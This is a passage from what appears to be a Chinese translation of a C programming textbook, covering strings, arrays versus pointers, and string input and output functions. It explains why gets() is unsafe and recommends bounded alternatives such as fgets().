示该字符串所指向地址上储存的值,应该是字符串*"space farers"的首字 符。是否真的是这样?下面是该程序的输出: We, 0x100000f61, s 2.字符串数组和初始化 定义字符串数组时,必须让编译器知道需要多少空间。一种方法是用足 够空间的数组储存字符串。在下面的声明中,用指定的字符串初始化数组 m1: const char m1[40] = "Limit yourself to one line's worth."; const表明不会更改这个字符串。 这种形式的初始化比标准的数组初始化形式简单得多: const char m1[40] = { 'L','i', 'm', 'i', 't', ' ', 'y', 'o', 'u', 'r', 's', 'e', 'l', 'f', ' ', 't', 'o', ' ', 'o', 'n', 'e', ' ','l', 'i', 'n', 'e', '\", 's', ' ', 'w', 'o', 'r','t', 'h', '.', '\0' }; 741 注意最后的空字符。没有这个空字符,这就不是一个字符串,而是一个 字符数组。 在指定数组大小时,要确保数组的元素个数至少比字符串长度多1(为 了容纳空字符)。所有未被使用的元素都被自动初始化为0(这里的0指的是 char形式的空字符,不是数字字符0),如图11.1所示。 图11.1 初始化数组 通常,让编译器确定数组的大小很方便。回忆一下,省略数组初始化声 明中的大小,编译器会自动计算数组的大小: const char m2[] = "If you can't think of anything, fake it."; 让编译器确定初始化字符数组的大小很合理。因为处理字符串的函数通 常都不知道数组的大小,这些函数通过查找字符串末尾的空字符确定字符串 在何处结束。 让编译器计算数组的大小只能用在初始化数组时。如果创建一个稍后再 填充的数组,就必须在声明时指定大小。声明数组时,数组大小必须是可求 值的整数。在C99新增变长数组之前,数组的大小必须是整型常量,包括由 整型常量组成的表达式。 int n = 8; char cookies[1];    // 有效 char cakes[2 + 5];// 有效,数组大小是整型常量表达式 742 char pies[2*sizeof(long double) + 1]; // 有效 char crumbs[n];     // 在C99标准之前无效,C99标准之后这种数组 是变长数组 字符数组名和其他数组名一样,是该数组首元素的地址。因此,假设有 下面的初始化: char car[10] = "Tata"; 那么,以下表达式都为真: car == &car[0]、*car == 'T'、*(car+1) == car[1] == 'a'。 还可以使用指针表示法创建字符串。例如,程序清单11.1中使用了下面 的声明: const char * pt1 = "Something is pointing at me."; 该声明和下面的声明几乎相同: const char ar1[] = "Something is pointing at me."; 以上两个声明表明,pt1和ar1都是该字符串的地址。在这两种情况下, 带双引号的字符串本身决定了预留给字符串的存储空间。尽管如此,这两种 形式并不完全相同。 3.数组和指针 数组形式和指针形式有何不同?以上面的声明为例,数组形式(ar1[]) 在计算机的内存中分配为一个内含29个元素的数组(每个元素对应一个字 符,还加上一个末尾的空字符'\0'),每个元素被初始化为字符串字面量对 应的字符。通常,字符串都作为可执行文件的一部分储存在数据段中。当把 程序载入内存时,也载入了程序中的字符串。字符串储存在静态存储区 (static memory)中。但是,程序在开始运行时才会为该数组分配内存。此 743 时,才将字符串拷贝到数组中(第 12 章将详细讲解)。注意,此时字符串 有两个副本。一个是在静态内存中的字符串字面量,另一个是储存在ar1数 组中的字符串。 此后,编译器便把数组名ar1识别为该数组首元素地址(&ar1[0])的别 名。这里关键要理解,在数组形式中,ar1是地址常量。不能更改ar1,如果 改变了ar1,则意味着改变了数组的存储位置(即地址)。可以进行类似 ar1+1这样的操作,标识数组的下一个元素。但是不允许进行++ar1这样的操 作。递增运算符只能用于变量名前(或概括地说,只能用于可修改的左 值),不能用于常量。 指针形式(*pt1)也使得编译器为字符串在静态存储区预留29个元素的 空间。另外,一旦开始执行程序,它会为指针变量pt1留出一个储存位置, 并把字符串的地址储存在指针变量中。该变量最初指向该字符串的首字符, 但是它的值可以改变。因此,可以使用递增运算符。例如,++pt1将指向第 2 个字符(o)。 字符串字面量被视为const数据。由于pt1指向这个const数据,所以应该 把pt1声明为指向const数据的指针。这意味着不能用pt1改变它所指向的数 据,但是仍然可以改变pt1的值(即,pt1指向的位置)。如果把一个字符串 字面量拷贝给一个数组,就可以随意改变数据,除非把数组声明为const。 总之,初始化数组把静态存储区的字符串拷贝到数组中,而初始化指针 只把字符串的地址拷贝给指针。程序清单11.3演示了这一点。 程序清单11.3 addresses.c程序 // addresses.c -- 字符串的地址 #define 
MSG "I'm special" #include <stdio.h> int main() 744 { char ar[] = MSG; const char *pt = MSG; printf("address of \"I'm special\": %p \n", "I'm special"); printf("         address ar: %p\n", ar); printf("         address pt: %p\n", pt); printf("       address of MSG: %p\n", MSG); printf("address of \"I'm special\": %p \n", "I'm special"); return 0; } 下面是在我们的系统中运行该程序后的输出: address of "I'm special": 0x100000f10 address ar: 0x7fff5fbff858 address pt: 0x100000f10 address of MSG: 0x100000f10 address of "I'm special": 0x100000f10 该程序的输出说明了什么?第一,pt和MSG的地址相同,而ar的地址不 同,这与我们前面讨论的内容一致。第二,虽然字符串字面量"I'm special"在程序的两个 printf()函数中出现了两次,但是编译器只使用了一个 存储位置,而且与MSG的地址相同。编译器可以把多次使用的相同字面量 745 储存在一处或多处。另一个编译器可能在不同的位置储存3个"I'm special"。 第三,静态数据使用的内存与ar使用的动态内存不同。不仅值不同,特定编 译器甚至使用不同的位数表示两种内存。 数组和指针表示字符串的区别是否很重要?通常不太重要,但是这取决 于想用程序做什么。我们来进一步讨论这个主题。 4.数组和指针的区别 初始化字符数组来储存字符串和初始化指针来指向字符串有何区别 (“指向字符串”的意思是指向字符串的首字符)?例如,假设有下面两个声 明: char heart[] = "I love Tillie!"; const char *head = "I love Millie!"; 两者主要的区别是:数组名heart是常量,而指针名head是变量。那么, 实际使用有什么区别? 首先,两者都可以使用数组表示法: for (i = 0; i < 6; i++) putchar(heart[i]); putchar('\n'); for (i = 0; i < 6; i++) putchar(head[i]); putchar('\n'); 上面两段代码的输出是: 746 I love I love 其次,两者都能进行指针加法操作: for (i = 0; i < 6; i++) putchar(*(heart + i)); putchar('\n'); for (i = 0; i < 6; i++) putchar(*(head + i)); putchar('\n'); 输出如下: I love I love 但是,只有指针表示法可以进行递增操作: while (*(head) != '\0')  /* 在字符串末尾处停止*/ putchar(*(head++));  /* 打印字符,指针指向下一个位置 */ 这段代码的输出如下: I love Millie! 假设想让head和heart统一,可以这样做: head = heart;   /* head现在指向数组heart */ 747 这使得head指针指向heart数组的首元素。 但是,不能这样做: heart = head;   /* 非法构造,不能这样写 */ 这类似于x = 3;和3 = x;的情况。赋值运算符的左侧必须是变量(或概括 地说是可修改的左值),如*pt_int。顺带一提,head = heart;不会导致head指 向的字符串消失,这样做只是改变了储存在head中的地址。除非已经保存 了"I love Millie!"的地址,否则当head指向别处时,就无法再访问该字符串。 另外,还可以改变heart数组中元素的信息: heart[7]= 'M';或者*(heart + 7) = 'M'; 数组的元素是变量(除非数组被声明为const),但是数组名不是变 量。 我们来看一下未使用const限定符的指针初始化: char * word = "frame"; 是否能使用该指针修改这个字符串? word[1] = 'l'; // 是否允许? 编译器可能允许这样做,但是对当前的C标准而言,这样的行为是未定 义的。例如,这样的语句可能导致内存访问错误。原因前面提到过,编译器 可以使用内存中的一个副本来表示所有完全相同的字符串字面量。例如,下 面的语句都引用字符串"Klingon"的一个内存位置: char * p1 = "Klingon"; p1[0] = 'F'; // ok? printf("Klingon"); 748 printf(": Beware the %ss!\n", "Klingon"); 也就是说,编译器可以用相同的地址替换每个"Klingon"实例。如果编译 器使用这种单次副本表示法,并允许p1[0]修改'F',那将影响所有使用该字 符串的代码。所以以上语句打印字符串字面量"Klingon"时实际上显示的 是"Flingon": Flingon: Beware the Flingons! 实际上在过去,一些编译器由于这方面的原因,其行为难以捉摸,而另 一些编译器则导致程序异常中断。因此,建议在把指针初始化为字符串字面 量时使用const限定符: const char * pl = "Klingon";  // 推荐用法 然而,把非const数组初始化为字符串字面量却不会导致类似的问题。 因为数组获得的是原始字符串的副本。 总之,如果不修改字符串,不要用指针指向字符串字面量。 5.字符串数组 如果创建一个字符数组会很方便,可以通过数组下标访问多个不同的字 符串。程序清单11.4演示了两种方法:指向字符串的指针数组和char类型数 组的数组。 程序清单11.4 arrchar.c程序 // arrchar.c -- 指针数组,字符串数组 #include <stdio.h> #define SLEN 40 #define LIM 5 749 int main(void) { const char *mytalents[LIM] = { "Adding numbers swiftly", "Multiplying accurately", "Stashing data", "Following instructions to the letter", "Understanding the C language" }; char yourtalents[LIM][SLEN] = { "Walking in a straight line", "Sleeping", "Watching television", "Mailing letters", "Reading email" }; int i; puts("Let's compare talents."); printf("%-36s  %-25s\n", "My Talents", "Your Talents"); for (i = 0; i < LIM; i++) printf("%-36s  %-25s\n", mytalents[i], yourtalents[i]); printf("\nsizeof mytalents: %zd, sizeof yourtalents: %zd\n", 750 sizeof(mytalents), sizeof(yourtalents)); return 0; } 下面是该程序的输出: Let's compare talents. 
My Talents                        Your Talents Adding numbers swiftly              Walking in  a straight line Multiplying accurately              Sleeping Stashing data                      Watching television Following instructions to the letter   Mailing letters Understanding the C language          Reading email sizeof mytalents: 40, sizeof yourtalents: 200 从某些方面来看,mytalents和yourtalents非常相似。两者都代表5个字符 串。使用一个下标时都分别表示一个字符串,如mytalents[0]和 yourtalents[0];使用两个下标时都分别表示一个字符,例如 mytalents[1][2]表 示 mytalents 数组中第 2 个指针所指向的字符串的第 3 个字符'l', yourtalents[1][2]表示youttalentes数组的第2个字符串的第3个字符'e'。而且, 两者的初始化方式也相同。 但是,它们也有区别。mytalents数组是一个内含5个指针的数组,在我 751 们的系统中共占用40字节。而yourtalents是一个内含5个数组的数组,每个数 组内含40个char类型的值,共占用200字节。所以,虽然mytalents[0]和 yourtalents[0]都分别表示一个字符串,但mytalents和yourtalents的类型并不相 同。mytalents中的指针指向初始化时所用的字符串字面量的位置,这些字符 串字面量被储存在静态内存中;而 yourtalents 中的数组则储存着字符串字面 量的副本,所以每个字符串都被储存了两次。此外,为字符串数组分配内存 的使用率较低。yourtalents 中的每个元素的大小必须相同,而且必须是能储 存最长字符串的大小。 我们可以把yourtalents想象成矩形二维数组,每行的长度都是40字节; 把mytalents想象成不规则的数组,每行的长度不同。图 11.2 演示了这两种数 组的情况(实际上,mytalents 数组的指针元素所指向的字符串不必储存在连 续的内存中,图中所示只是为了强调两种数组的不同)。 752 图11.2 矩形数组和不规则数组 综上所述,如果要用数组表示一系列待显示的字符串,请使用指针数 组,因为它比二维字符数组的效率高。但是,指针数组也有自身的缺点。 753 mytalents 中的指针指向的字符串字面量不能更改;而yourtalentsde 中的内容 可以更改。所以,如果要改变字符串或为字符串输入预留空间,不要使用指 向字符串字面量的指针。 11.1.2 指针和字符串 读者可能已经注意到了,在讨论字符串时或多或少会涉及指针。实际 上,字符串的绝大多数操作都是通过指针完成的。例如,考虑程序清单11.5 中的程序。 程序清单11.5 p_and_s.c程序 /* p_and_s.c -- 指针和字符串 */ #include <stdio.h> int main(void) { const char * mesg = "Don't be a fool!"; const char * copy; copy = mesg; printf("%s\n", copy); printf("mesg = %s; &mesg = %p; value = %p\n", mesg,  &mesg, mesg); printf("copy = %s; &copy = %p; value = %p\n", copy,  &copy, copy); return 0; 754 } 注意 如果编译器不识别%p,用%u或%lu代替%p。 你可能认为该程序拷贝了字符串"Don't be a fool!",程序的输出似乎也验 证了你的猜测: Don't be a fool! mesg = Don't be a fool!; &mesg = 0x0012ff48; value =  0x0040a000 copy = Don't be a fool!; &copy = 0x0012ff44; value =  0x0040a000 我们来仔细分析最后两个printf()的输出。首先第1项,mesg和copy都以 字符串形式输出(%s转换说明)。这里没问题,两个字符串都是"Don't be a fool!"。 接着第2项,打印两个指针的地址。如上输出所示,指针mesg和copy分 别储存在地址为0x0012ff48和0x0012ff44的内存中。 注意最后一项,显示两个指针的值。所谓指针的值就是它储存的地址。 mesg 和 copy 的值都是0x0040a000,说明它们都指向的同一个位置。因此, 程序并未拷贝字符串。语句copy = mesg;把mesg的值赋给copy,即让copy也指 向mesg指向的字符串。 为什么要这样做?为何不拷贝整个字符串?假设数组有50个元素,考虑 一下哪种方法更效率:拷贝一个地址还是拷贝整个数组?通常,程序要完成 某项操作只需要知道地址就可以了。如果确实需要拷贝整个数组,可以使用 strcpy()或strncpy()函数,本章稍后介绍这两个函数。 我们已经讨论了如何在程序中定义字符串,接下来看看如何从键盘输入 755 字符串。 756 11.2 字符串输入 如果想把一个字符串读入程序,首先必须预留储存该字符串的空间,然 后用输入函数获取该字符串。 11.2.1 分配空间 要做的第 1 件事是分配空间,以储存稍后读入的字符串。前面提到过, 这意味着必须要为字符串分配足够的空间。不要指望计算机在读取字符串时 顺便计算它的长度,然后再分配空间(计算机不会这样做,除非你编写一个 处理这些任务的函数)。假设编写了如下代码: char *name; scanf("%s", name); 虽然可能会通过编译(编译器很可能给出警告),但是在读入name 时,name可能会擦写掉程序中的数据或代码,从而导致程序异常中止。因 为scanf()要把信息拷贝至参数指定的地址上,而此时该参数是个未初始化的 指针,name可能会指向任何地方。大多数程序员都认为出现这种情况很搞 笑,但仅限于评价别人的程序时。 最简单的方法是,在声明时显式指明数组的大小: char name[81]; 现在name是一个已分配块(81字节)的地址。还有一种方法是使用C库 函数来分配内存,第12章将详细介绍。 为字符串分配内存后,便可读入字符串。C 库提供了许多读取字符串的 函数:scanf()、gets()和fgets()。我们先讨论最常用gets()函数。 11.2.2 不幸的gets()函数 757 在读取字符串时,scanf()和转换说明%s只能读取一个单词。可是在程序 中经常要读取一整行输入,而不仅仅是一个单词。许多年前,gets()函数就 用于处理这种情况。gets()函数简单易用,它读取整行输入,直至遇到换行 符,然后丢弃换行符,储存其余字符,并在这些字符的末尾添加一个空字符 使其成为一个 C 字符串。它经常和 puts()函数配对使用,该函数用于显示字 符串,并在末尾添加换行符。程序清单11.6中演示了这两个函数的用法。 程序清单11.6 getsputs.c程序 /* getsputs.c -- 使用 gets() 和 puts() */ #include <stdio.h> #define STLEN 81 int main(void) { char words[STLEN]; puts("Enter a string, please."); gets(words); // 典型用法 printf("Your string twice:\n"); printf("%s\n", words); puts(words); puts("Done."); return 0; } 758 下面是该程序在某些编译器(或者至少是旧式编译器)中的运行示例: Enter a string, please. 
I want to learn about string theory! Your string twice: I want to learn about string theory! I want to learn about string theory! Done. 整行输入(除了换行符)都被储存在 words 中,puts(words)和 printf("%s\n, words")的效果相同。 下面是该程序在另一个编译器中的输出示例: Enter a string, please. warning: this program uses gets(), which is unsafe. Oh, no! Your string twice: Oh, no! Oh, no! Done. 编译器在输出中插入了一行警告消息。每次运行这个程序,都会显示这 行消息。但是,并非所有的编译器都会这样做。其他编译器可能在编译过程 中给出警告,但不会引起你的注意。 759 这是怎么回事?问题出在 gets()唯一的参数是 words,它无法检查数组 是否装得下输入行。上一章介绍过,数组名会被转换成该数组首元素的地 址,因此,gets()函数只知道数组的开始处,并不知道数组中有多少个元 素。 如果输入的字符串过长,会导致缓冲区溢出(buffer overflow),即多 余的字符超出了指定的目标空间。如果这些多余的字符只是占用了尚未使用 的内存,就不会立即出现问题;如果它们擦写掉程序中的其他数据,会导致 程序异常中止;或者还有其他情况。为了让输入的字符串容易溢出,把程序 中的STLEN设置为5,程序的输出如下: Enter a string, please. warning: this program uses gets(), which is unsafe. I think I'll be just fine. Your string twice: I think I'll be just fine. I think I'll be just fine. Done. Segmentation fault: 11 “Segmentation fault”(分段错误)似乎不是个好提示,的确如此。在 UNIX系统中,这条消息说明该程序试图访问未分配的内存。 C 提供解决某些编程问题的方法可能会导致陷入另一个尴尬棘手的困 境。但是,为什么要特别提到gets()函数?因为该函数的不安全行为造成了 安全隐患。过去,有些人通过系统编程,利用gets()插入和运行一些破坏系 统安全的代码。 760 不久,C 编程社区的许多人都建议在编程时摒弃 gets()。制定 C99 标准 的委员会把这些建议放入了标准,承认了gets()的问题并建议不要再使用 它。尽管如此,在标准中保留gets()也合情合理,因为现有程序中含有大量 使用该函数的代码。而且,只要使用得当,它的确是一个很方便的函数。 好景不长,C11标准委员会采取了更强硬的态度,直接从标准中废除了 gets()函数。既然标准已经发布,那么编译器就必须根据标准来调整支持什 么,不支持什么。然而在实际应用中,编译器为了能兼容以前的代码,大部 分都继续支持gets()函数。不过,我们使用的编译器,可没那么大方。 11.2.3 gets()的替代品 过去通常用fgets()来代替gets(),fgets()函数稍微复杂些,在处理输入方 面与gets()略有不同。C11标准新增的gets_s()函数也可代替gets()。该函数与 gets()函数更接近,而且可以替换现有代码中的gets()。但是,它是stdio.h输 入/输出函数系列中的可选扩展,所以支持C11的编译器也不一定支持它。 1.fgets()函数(和fputs()) fgets()函数通过第2个参数限制读入的字符数来解决溢出的问题。该函 数专门设计用于处理文件输入,所以一般情况下可能不太好用。fgets()和 gets()的区别如下。 fgets()函数的第2个参数指明了读入字符的最大数量。如果该参数的值 是n,那么fgets()将读入n-1个字符,或者读到遇到的第一个换行符为止。 如果fgets()读到一个换行符,会把它储存在字符串中。这点与gets()不 同,gets()会丢弃换行符。 fgets()函数的第3 个参数指明要读入的文件。如果读入从键盘输入的数 据,则以stdin(标准输入)作为参数,该标识符定义在stdio.h中。 因为 fgets()函数把换行符放在字符串的末尾(假设输入行不溢出),通 常要与 fputs()函数(和puts()类似)配对使用,除非该函数不在字符串末尾 761 添加换行符。fputs()函数的第2个参数指明它要写入的文件。如果要显示在 计算机显示器上,应使用stdout(标准输出)作为该参数。程序清单11.7演 示了fgets()和fputs()函数的用法。 程序清单11.7 fgets1.c程序 /* fgets1.c -- 使用 fgets() 和 fputs() */ #include <stdio.h> #define STLEN 14 int main(void) { char words[STLEN]; puts("Enter a string, please."); fgets(words, STLEN, stdin); printf("Your string twice (puts(), then fputs()):\n"); puts(words); fputs(words, stdout); puts("Enter another string, please."); fgets(words, STLEN, stdin); printf("Your string twice (puts(), then fputs()):\n"); puts(words); fputs(words, stdout); 762 puts("Done."); return 0; } 下面是该程序的输出示例: Enter a string, please. apple pie Your string twice (puts(), then fputs()): apple pie apple pie Enter another string, please. strawberry shortcake Your string twice (puts(), then fputs()): strawberry sh strawberry shDone. 
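顺带补充一点:上面的示例都以 stdin 作为 fgets() 的第3个参数,即从键盘读取。该参数同样可以是用 fopen() 打开的文件,这正是 fgets() 被设计用于文件输入的体现。下面是一个极简的示意(并非原书的程序清单;文件的打开与关闭将在后面的章节详细介绍,这里假设当前目录下存在名为 notes.txt 的文本文件):
/* fgets_file.c -- 用 fgets() 逐行读取文件(示意) */
#include <stdio.h>
#define LEN 81
int main(void)
{
    char line[LEN];
    FILE * fp = fopen("notes.txt", "r");   /* 假设该文件存在 */
    if (fp == NULL)
    {
        puts("Can't open notes.txt.");
        return 1;
    }
    while (fgets(line, LEN, fp) != NULL)   /* 读到文件结尾时返回 NULL */
        fputs(line, stdout);               /* fgets()保留换行符,fputs()不再添加 */
    fclose(fp);
    return 0;
}
由于 fgets() 保留了每行末尾的换行符,而 fputs() 不额外添加换行符,所以文件内容会按原样逐行显示。下面回到对上面键盘输入示例的分析。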
第1行输入,apple pie,比fgets()读入的整行输入短,因此,apple pie\n\0 被储存在数组中。所以当puts()显示该字符串时又在末尾添加了换行符,因 此apple pie后面有一行空行。因为fputs()不在字符串末尾添加换行符,所以 并未打印出空行。 第2行输入,strawberry shortcake,超过了大小的限制,所以fgets()只读 入了13个字符,并把strawberry sh\0 储存在数组中。再次提醒读者注意, puts()函数会在待输出字符串末尾添加一个换行符,而fputs()不会这样做。 763 fputs()函数返回指向 char的指针。如果一切进行顺利,该函数返回的地 址与传入的第 1 个参数相同。但是,如果函数读到文件结尾,它将返回一个 特殊的指针:空指针(null pointer)。该指针保证不会指向有效的数据,所 以可用于标识这种特殊情况。在代码中,可以用数字0来代替,不过在C语 言中用宏NULL来代替更常见(如果在读入数据时出现某些错误,该函数也 返回NULL)。程序清单11.8演示了一个简单的循环,读入并显示用户输入 的内容,直到fgets()读到文件结尾或空行(即,首字符是换行符)。 程序清单11.8 fgets2.c程序 /* fgets2.c -- 使用 fgets() 和 fputs() */ #include <stdio.h> #define STLEN 10 int main(void) { char words[STLEN]; puts("Enter strings (empty line to quit):"); while (fgets(words, STLEN, stdin) != NULL &&  words[0] != '\n') fputs(words, stdout); puts("Done."); return 0; } 下面是该程序的输出示例: 764 Enter strings (empty line to quit): By the way, the gets() function By the way, the gets() function also returns a null pointer if it also returns a null pointer if it encounters end-of-file. encounters end-of-file. Done. 有意思,虽然STLEN被设置为10,但是该程序似乎在处理过长的输入时 完全没问题。程序中的fgets()一次读入 STLEN - 1 个字符(该例中为 9 个字 符)。所以,一开始它只读入了“By the wa”,并储存为By the wa\0;接着 fputs()打印该字符串,而且并未换行。然后while循环进入下一轮迭代, fgets()继续从剩余的输入中读入数据,即读入“y, the ge”并储存为y, the ge\0; 接着fputs()在刚才打印字符串的这一行接着打印第 2 次读入的字符串。然后 while 进入下一轮迭代,fgets()继续读取输入、fputs()打印字符串,这一过程 循环进行,直到读入最后的“tion\n”。fgets()将其储存为tion\n\0, fputs()打印 该字符串,由于字符串中的\n,光标被移至下一行开始处。 系统使用缓冲的I/O。这意味着用户在按下Return键之前,输入都被储存 在临时存储区(即,缓冲区)中。按下Return键就在输入中增加了一个换行 符,并把整行输入发送给fgets()。对于输出,fputs()把字符发送给另一个缓 冲区,当发送换行符时,缓冲区中的内容被发送至屏幕上。 fgets()储存换行符有好处也有坏处。坏处是你可能并不想把换行符储存 在字符串中,这样的换行符会带来一些麻烦。好处是对于储存的字符串而 言,检查末尾是否有换行符可以判断是否读取了一整行。如果不是一整行, 765 要妥善处理一行中剩下的字符。 首先,如何处理掉换行符?一个方法是在已储存的字符串中查找换行 符,并将其替换成空字符: while (words[i] != '\n') // 假设\n在words中 i++; words[i] = '\0'; 其次,如果仍有字符串留在输入行怎么办?一个可行的办法是,如果目 标数组装不下一整行输入,就丢弃那些多出的字符: while (getchar() != '\n') // 读取但不储存输入,包括\n continue; 程序清单11.9在程序清单11.8的基础上添加了一部分测试代码。该程序 读取输入行,删除储存在字符串中的换行符,如果没有换行符,则丢弃数组 装不下的字符。 程序清单11.9 fgets3.c程序 /* fgets3.c -- 使用 fgets() */ #include <stdio.h> #define STLEN 10 int main(void) { char words[STLEN]; 766 int i; puts("Enter strings (empty line to quit):"); while (fgets(words, STLEN, stdin) != NULL &&  words[0] != '\n') { i = 0; while (words[i] != '\n' && words[i] != '\0') i++; if (words[i] == '\n') words[i] = '\0'; else // 如果word[i] == '\0'则执行这部分代码 while (getchar() != '\n') continue; puts(words); } puts("done"); return 0; } 循环 767 while (words[i] != '\n' && words[i] != '\0') i++; 遍历字符串,直至遇到换行符或空字符。如果先遇到换行符,下面的if 语句就将其替换成空字符;如果先遇到空字符,else部分便丢弃输入行的剩 余字符。下面是该程序的输出示例: Enter strings (empty line to quit): This This program seems program s unwilling to accept long lines. unwilling But it doesn't get stuck on long But it do lines either. 
lines eit done 空字符和空指针 程序清单 11.9 中出现了空字符和空指针。从概念上看,两者完全不 同。空字符(或'\0')是用于标记C字符串末尾的字符,其对应字符编码是 768 0。由于其他字符的编码不可能是 0,所以不可能是字符串的一部分。 空指针(或NULL)有一个值,该值不会与任何数据的有效地址对应。 通常,函数使用它返回一个有效地址表示某些特殊情况发生,例如遇到文件 结尾或未能按预期执行。 空字符是整数类型,而空指针是指针类型。两者有时容易混淆的原因 是:它们都可以用数值0来表示。但是,从概念上看,两者是不同类型的0。 另外,空字符是一个字符,占1字节;而空指针是一个地址,通常占4字节。 2.gets_s()函数 C11新增的gets_s()函数(可选)和fgets()类似,用一个参数限制读入的 字符数。假设把程序清单11.9中的fgets()换成gets_s(),其他内容不变,那么 下面的代码将把一行输入中的前9个字符读入words数组中,假设末尾有换行 符: gets_s(words, STLEN); gets_s()与fgets()的区别如下。 gets_s()只从标准输入中读取数据,所以不需要第3个参数。 如果gets_s()读到换行符,会丢弃它而不是储存它。 如果gets_s()读到最大字符数都没有读到换行符,会执行以下几步。首 先把目标数组中的首字符设置为空字符,读取并丢弃随后的输入直至读到换 行符或文件结尾,然后返回空指针。接着,调用依赖实现的“处理函数”(或 你选择的其他函数),可能会中止或退出程序。 第2个特性说明,只要输入行未超过最大字符数,gets_s()和gets()几乎一 样,完全可以用gets_s()替换gets()。第3个特性说明,要使用这个函数还需要 进一步学习。 我们来比较一下 gets()、fgets()和 gets_s()的适用性。如果目标存储区装 769 得下输入行,3 个函数都没问题。但是fgets()会保留输入末尾的换行符作为 字符串的一部分,要编写额外的代码将其替换成空字符。 如果输入行太长会怎样?使用gets()不安全,它会擦写现有数据,存在 安全隐患。gets_s()函数很安全,但是,如果并不希望程序中止或退出,就 要知道如何编写特殊的“处理函数”。另外,如果打算让程序继续运行, gets_s()会丢弃该输入行的其余字符,无论你是否需要。由此可见,当输入 太长,超过数组可容纳的字符数时,fgets()函数最容易使用,而且可以选择 不同的处理方式。如果要让程序继续使用输入行中超出的字符,可以参考程 序清单11.8中的处理方法。如果想丢弃输入行的超出字符,可以参考程序清 单11.9中的处理方法。 所以,当输入与预期不符时,gets_s()完全没有fgets()函数方便、灵活。 也许这也是gets_s()只作为C库的可选扩展的原因之一。鉴于此,fgets()通常 是处理类似情况的最佳选择。 3.s_gets()函数 程序清单11.9演示了fgets()函数的一种用法:读取整行输入并用空字符 代替换行符,或者读取一部分输入,并丢弃其余部分。既然没有处理这种情 况的标准函数,我们就创建一个,在后面的程序中会用得上。程序清单 11.10提供了一个这样的函数。 程序清单11.10 s_gets()函数 char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); 770 if (ret_val) // 即,ret_val != NULL { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 如果 fgets()返回 NULL,说明读到文件结尾或出现读取错误,s_gets()函 数跳过了这个过程。它模仿程序清单11.9的处理方法,如果字符串中出现换 行符,就用空字符替换它;如果字符串中出现空字符,就丢弃该输入行的其 余字符,然后返回与fgets()相同的值。我们在后面的示例中将讨论fgets()函 数。 也许读者想了解为什么要丢弃过长输入行中的余下字符。这是因为,输 入行中多出来的字符会被留在缓冲区中,成为下一次读取语句的输入。例 如,如果下一条读取语句要读取的是 double 类型的值,就可能导致程序崩 溃。丢弃输入行余下的字符保证了读取语句与键盘输入同步。 我们设计的 s_gets()函数并不完美,它最严重的缺陷是遇到不合适的输 771 入时毫无反应。它丢弃多余的字符时,既不通知程序也不告知用户。但是, 用来替换前面程序示例中的gets()足够了。 11.2.4 scanf()函数 我们再来研究一下scanf()。前面的程序中用scanf()和%s转换说明读取字 符串。scanf()和gets()或fgets()的区别在于它们如何确定字符串的末尾: scanf()更像是“获取单词”函数,而不是“获取字符串”函数;如果预留的存储 区装得下输入行,gets()和fgets()会读取第1个换行符之前所有的字符。 scanf()函数有两种方法确定输入结束。无论哪种方法,都从第1个非空白字 符作为字符串的开始。如果使用%s转换说明,以下一个空白字符(空行、 空格、制表符或换行符)作为字符串的结束(字符串不包括空白字符)。如 果指定了字段宽度,如%10s,那么scanf()将读取10 个字符或读到第1个空白 字符停止(先满足的条件即是结束输入的条件),见图11.3。 图11.3 字段宽度和scanf() 前面介绍过,scanf()函数返回一个整数值,该值等于scanf()成功读取的 项数或EOF(读到文件结尾时返回EOF)。 程序清单11.11演示了在scanf()函数中指定字段宽度的用法。 程序清单11.11 scan_str.c程序 /* scan_str.c -- 使用 scanf() */ #include <stdio.h> 772 int main(void) { char name1[11], name2[11]; int count; printf("Please enter 2 names.\n"); count = scanf("%5s %10s", name1, name2); printf("I read the %d names %s and %s.\n", count, name1,  name2); return 0; } 下面是该程序的3个输出示例: Please enter 2 names. Jesse Jukes I read the 2 names Jesse and Jukes. Please enter 2 names. Liza Applebottham I read the 2 names Liza and Applebotth. Please enter 2 names. Portensia Callowit 773 I read the 2 names Porte and nsia. 
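在逐一分析这些输出之前,先补充一个小技巧(这不是原书的程序清单,仅作示意):%s 的字段宽度必须直接写在格式字符串中,无法像变长数组那样使用变量。如果希望字段宽度始终与数组大小保持一致,常见的做法是先用 sprintf()(11.5节会提到该函数)构造格式字符串:
/* scan_width.c -- 用 sprintf() 构造带字段宽度的格式字符串(示意) */
#include <stdio.h>
#define NAMELEN 11
int main(void)
{
    char name[NAMELEN];
    char fmt[10];
    /* 生成 "%10s":字段宽度取数组大小减1,给末尾的空字符留出位置 */
    sprintf(fmt, "%%%ds", NAMELEN - 1);
    printf("Please enter a name.\n");
    if (scanf(fmt, name) == 1)      /* scanf()返回成功读取的项数 */
        printf("I read the name %s.\n", name);
    return 0;
}
这样一来,即使以后修改了 NAMELEN,读取时的字段宽度也会自动跟着变化。下面逐一分析前面的3个运行示例。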
第1个输出示例,两个名字的字符个数都未超过字段宽度。第2个输出示 例,只读入了Applebottham的前10个字符Applebotth(因为使用了%10s转换 说明)。第3个输出示例,Portensia的后4个字符nsia被写入name2中,因为第 2次调用scanf()时,从上一次调用结束的地方继续读取数据。在该例中,读 取的仍是Portensia中的字母。 根据输入数据的性质,用fgets()读取从键盘输入的数据更合适。例如, scanf()无法完整读取书名或歌曲名,除非这些名称是一个单词。scanf()的典 型用法是读取并转换混合数据类型为某种标准形式。例如,如果输入行包含 一种工具名、库存量和单价,就可以使用scanf()。否则可能要自己拼凑一个 函数处理一些输入检查。如果一次只输入一个单词,用scanf()也没问题。 scanf()和gets()类似,也存在一些潜在的缺点。如果输入行的内容过长, scanf()也会导致数据溢出。不过,在%s转换说明中使用字段宽度可防止溢 出。 774 11.3 字符串输出 讨论完字符串输入,接下来我们讨论字符串输出。C有3个标准库函数 用于打印字符串:put()、fputs()和printf()。 11.3.1 puts()函数 puts()函数很容易使用,只需把字符串的地址作为参数传递给它即可。 程序清单11.12演示了puts()的一些用法。 程序清单11.12 put_out.c程序 /* put_out.c -- 使用 puts() */ #include <stdio.h> #define DEF "I am a #defined string." int main(void) { char str1[80] = "An array was initialized to me."; const char * str2 = "A pointer was initialized to me."; puts("I'm an argument to puts()."); puts(DEF); puts(str1); puts(str2); puts(&str1[5]); 775 puts(str2 + 4); return 0; } 该程序的输出如下: I'm an argument to puts(). I am a #defined string. An array was initialized to me. A pointer was initialized to 